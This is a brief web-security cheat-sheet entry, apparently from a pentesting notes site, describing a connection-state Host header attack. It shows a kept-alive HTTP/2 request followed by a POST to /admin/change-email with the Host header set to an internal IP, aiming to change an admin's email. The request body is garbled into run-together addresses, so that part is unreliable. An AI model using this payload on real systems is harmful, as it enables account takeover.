Host Header Attack
Last modified: 2023-06-11
If the web server validates the Host header only on the first request of a connection, we may be able to exploit the second request by keeping the connection alive and changing the Host header to point at the internal page.
GET / HTTP/2
Host: example.com
...
Connection: keep-alive

POST /admin/change-email HTTP/2
Host: 192.168.0.1

firstname.lastname@example.orgemail@example.comfirstname.lastname@example.org
As a result, we may be able to change the admin's email to an arbitrary email address.